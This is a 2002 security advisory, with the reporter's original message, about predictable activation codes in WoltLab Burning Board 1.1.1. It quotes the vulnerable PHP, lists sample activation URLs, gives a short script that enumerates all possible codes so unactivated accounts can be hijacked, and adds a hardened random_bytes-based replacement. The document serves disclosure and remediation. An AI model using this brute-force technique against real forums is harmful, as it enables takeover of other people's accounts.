SecurityTracker.com
Category:  Application (Forum/Board/Portal)  >  WoltLab Burning Board (wBB)
Vendors:  Woltlab
WoltLab Burning Board Forum Lets Remote Users Hijack Newly Assigned User Accounts
SecurityTracker Alert ID:  1004390
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  May 28 2002
Impact:  User access via network
Exploit Included:  Yes
Version(s): 1.1.1
Description:  An authentication vulnerability was reported in the WoltLab Burning Board web forum software. A remote user may be able to hijack a newly registered user account.

It is reported that WoltLab Burning Board (wBB) generates predictable, guessable activation codes (which serve as temporary passwords) when it creates a new user account. If another user has requested a new account but has not yet activated the registration, that user's account may be hijacked.

To determine how many users exist on the forum, a remote user can register for a new account. The remote user will receive a confirmation e-mail containing an activation URL of the following form:

http://forum.dom/forum/action.php?action=activation&userid=345&code=1563109322

In the above example, any subsequent user will be assigned a userid of 346 or higher, so a remote user can attempt to guess the 'code' for any subsequent user. According to the report, the wBB software seeds its random number generator with the current time (the seconds value of the date), so it can generate only a limited number of codes (possibly 30 integer words). A remote user can therefore feasibly brute force the proper code for a newly assigned user account.

A demonstration exploit that will apparently generate all of the possible codes is provided:

<?php
// Re-seed the generator with each seconds value the forum could have used
// and print the activation code that results from that seed.
for($i=0; $i<60; $i++)
{
    mt_srand($i);
    echo mt_rand()."<BR>";
}
?>

Impact:  A remote user may be able to guess the password of a newly requested user account before the user account registration has been activated.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.woltlab.de/
Cause:  Authentication error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  SeazoN <seazon@dnestr.com>
Message History:   None.


 Source Message Contents

Date:  Sun, 26 May 2002 17:11:17 +0300
From:  SeazoN <seazon@dnestr.com>
Subject:  wbbboard 1.1.1 registration _new_users_vulnerability_

 

wbbboard 1.1.1 registration _new_users_vulnerability_
--------------------------------------------------
wbbboard  : I can't find any contact info in the credits :(
            I sent a message to wbbhacks.de and mywbb.de
            (support forums); they didn't reply for 3
            days (I think that's enough)

Affected program         : wbbboard 1.1.1
Vendor                   : http://www.woltlab.de/
Vulnerability-Class      : security bug
OS specific              : No
Remote                   : Yes
Problem-Skill            : High for users waiting for registration activation
                           None for activated users

SUMMARY

wbbboard is a PHP & MySQL based forum.

Here is some code (register.php)
---------------------------
$datum = date("s");
mt_srand($datum);
$z = mt_rand();
$db_zugriff->query("INSERT INTO bb".$n."_user_table
    (username,userpassword,useremail,regemail,groupid,regdate,lastvisit,lastactivity,activation)
    VALUES ('$name','$password','$email','$email','$default_group','$time','$time','$time',$z)");
---------------------------

After that the script mails user@mail.dom with the URL for activation.

Here is some code from action.php
---------------------------
if($action=="activation") {
    $result = activat($userid,$code);
    if($result == 1) eval ("\$output = \"".gettemplate("error1")."\";");
    if($result == 2) eval ("\$output = \"".gettemplate("error22")."\";");
    if($result == 3) eval ("\$output = \"".gettemplate("error23")."\";");
    if(!$result) {
        $user_id = $userid;
        eval ("\$output = \"".gettemplate("note21")."\";");
        $user_password = getUserPW($userid);
        session_register("user_id");
        session_register("user_password");
        setcookie("user_id", "$user_id", time()+(3600*24*365));
        setcookie("user_password", "$user_password", time()+(3600*24*365));
    }
    $ride = "main.php?styleid=$styleid$session";
---------------------------

IMPACT

You can steal a NEW user's account with his password.

EXPLOIT

Register in the forum; you will receive a message like this:

To continue registration
http://forum.dom/forum/action.php?action=activation&userid=345&code=1563109322

Now you know how many users are on the forum and can hijack users with userid=346 (for example).

HEART OF EXPLOIT
----------------------
| $datum = date("s"); |
| mt_srand($datum);   |   this code results in only 30 original integer words :)
| $z = mt_rand();     |   I think it is not so hard to bruteforce
----------------------

http://forum.dom/forum/action.php?action=activation&userid=346&code=1898087491
http://forum.dom/forum/action.php?action=activation&userid=346&code=1309289693
....
http://forum.dom/forum/action.php?action=activation&userid=346&code=356268007

You can get all variations with this script:

<?php
for($i=0; $i<60; $i++)
{
    mt_srand($i);
    echo mt_rand()."<BR>";
    // ^^^^^^^^^ here you are :)
}
?>

SOLUTION: use simple rand() or really unpredictable md5(uniqid(rand(),1))
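The following PHP is an added example; it is not part of the advisory, the reporter's message, or WoltLab's code. It places the weak generation pattern quoted from register.php (seconds of the clock fed to mt_srand, then one mt_rand call) beside a hardened activation-code generator built on random_bytes(), and includes a keyspace-size check that counts how many distinct codes the weak pattern can ever produce. The function names, the 16-byte token length, and the hash_equals() comparison are this example's own choices. Two caveats: the exact integers mt_rand() returns for a given seed depend on the PHP version (the Mersenne Twister implementation changed in PHP 7.1), so the count, not the specific values, is what the check demonstrates; and a hex token would need a string column in place of the integer 'activation' column shown in the INSERT above.

```php
<?php
// Added example (not the advisory's or WoltLab's code): weak vs. hardened
// activation-code generation for a registration flow like the one quoted above.

// Weak pattern, as in the register.php excerpt: the seed is the current
// second (00..59), so the generator has at most 60 possible states and the
// code it emits is fully determined by the second the account was created.
function weak_activation_code(): int
{
    $datum = date("s");          // "00".."59"
    mt_srand((int)$datum);       // seed taken from the clock
    return mt_rand();            // the "secret" activation code
}

// Keyspace check: re-seed with every second the weak pattern could have used
// and count the distinct codes. Whatever the PHP version, this is at most 60,
// which is why the advisory describes the code as brute-forceable.
function weak_keyspace_size(): int
{
    $codes = [];
    for ($second = 0; $second < 60; $second++) {
        mt_srand($second);
        $codes[mt_rand()] = true;   // keyed by value, so duplicates collapse
    }
    return count($codes);
}

// Hardened alternative (this example's choice, not WoltLab's fix): 128 bits
// from the OS CSPRNG via random_bytes() (PHP 7.0+). Nothing about the seed,
// the clock, or previous codes lets anyone predict the next token.
function strong_activation_code(): string
{
    return bin2hex(random_bytes(16));   // 32 hex characters, 2^128 possibilities
}

// When the user follows the activation link, compare the stored token with the
// presented one in constant time so the comparison itself leaks nothing.
function activation_code_matches(string $stored, string $presented): bool
{
    return hash_equals($stored, $presented);
}

// Demonstration run.
printf("weak pattern: %d distinct codes possible in total\n", weak_keyspace_size());
printf("weak code right now: %d\n", weak_activation_code());

$token = strong_activation_code();
printf("strong code: %s\n", $token);

// Simulate the activation link check: the stored token against a correct and a wrong guess.
var_dump(activation_code_matches($token, $token));                 // bool(true)
var_dump(activation_code_matches($token, strong_activation_code())); // bool(false)
```

The defensive point is the size of the keyspace rather than any particular value: weak_keyspace_size() returns at most 60 for the clock-seeded pattern, while strong_activation_code() draws from 2^128 values. Storing the strong token requires a VARCHAR(32) (or larger) 'activation' column rather than the integer column the quoted INSERT assumes, and the activat() routine would compare with hash_equals() instead of an integer equality check.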



Copyright 2002, SecurityGlobal.net LLC